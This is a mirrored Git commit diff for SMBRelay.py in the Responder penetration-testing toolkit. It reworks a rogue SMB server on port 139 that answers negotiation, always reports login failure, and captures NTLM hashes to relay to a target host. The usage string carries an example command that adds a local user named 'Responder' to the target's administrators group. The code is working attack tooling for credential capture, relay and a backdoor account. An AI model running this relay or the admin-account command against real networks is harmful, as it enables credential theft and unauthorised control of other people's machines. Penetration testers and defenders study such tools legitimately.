github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-15 01:22:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

minor changes

Browse source
This commit is contained in:
lgandx 2014-01-27 22:10:50 -05:00
parent 583cdb7254
commit 4f239a2ef1
1 changed files with 44 additions and 38 deletions
Download patch file Download diff file Expand all files Collapse all files

82
SMBRelay.py
View file

@ -29,7 +29,7 @@ def UserCallBack(op, value, dmy, parser):
args.extend(getattr(parser.values, op.dest)) args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args) setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -r ", parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
@ -38,7 +38,7 @@ parser.add_option('-c',action='store', help='Command to run on the target.',meta
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials.",metavar="WORKGROUP",dest="Domain") parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay") parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
@ -198,43 +198,48 @@ def Parse_Nego_Dialect(data):
return "\x0a\x00" return "\x0a\x00"
def SmbRogueSrv139(key,Target,DomainMachineName): def SmbRogueSrv139(key,Target,DomainMachineName):
try: s = socket(AF_INET,SOCK_STREAM)
s = socket(AF_INET,SOCK_STREAM) s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1) s.settimeout(30)
s.bind(('0.0.0.0', 139)) try:
s.listen(0) s.bind(('0.0.0.0', 139))
s.settimeout(30) s.listen(0)
conn, addr = s.accept() conn, addr = s.accept()
while True: except error, msg:
data = conn.recv(1024) if "Address already in use" in msg:
##session request 139 print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
if data[0] == "\x81":
buffer0 = "\x82\x00\x00\x00" try:
conn.send(buffer0) while True:
##Negotiate proto answer. data = conn.recv(1024)
if data[8:10] == "\x72\x00": ##session request 139
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data)) if data[0] == "\x81":
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName) buffer0 = "\x82\x00\x00\x00"
t.calculate() conn.send(buffer0)
packet1 = str(head)+str(t) ##Negotiate proto answer.
buffer1 = longueur(packet1)+packet1 if data[8:10] == "\x72\x00":
conn.send(buffer1) head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
##Session Setup AndX Request t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
if data[8:10] == "\x73\x00": t.calculate()
if Is_Anonymous(data): packet1 = str(head)+str(t)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) buffer1 = longueur(packet1)+packet1
packet1 = str(head)+str(SMBSessEmpty())
buffer1 = longueur(packet1)+packet1
conn.send(buffer1) conn.send(buffer1)
else: ##Session Setup AndX Request
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) if data[8:10] == "\x73\x00":
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways. if Is_Anonymous(data):
buffer1 = longueur(packet1)+packet1 head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
conn.send(buffer1) packet1 = str(head)+str(SMBSessEmpty())
Credz = ParseHash(data,addr[0],Target) buffer1 = longueur(packet1)+packet1
return Credz conn.send(buffer1)
except: else:
return None head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
Credz = ParseHash(data,addr[0],Target)
return Credz
except:
return None
def RunRelay(host, Command,Domain): def RunRelay(host, Command,Domain):
Target = host Target = host
@ -419,6 +424,7 @@ def RunRelay(host, Command,Domain):
if data[8:10] != "\x2e\x00": if data[8:10] != "\x2e\x00":
return False return False
def RunInloop(Target,Command,Domain): def RunInloop(Target,Command,Domain):
try: try:
while True: while True: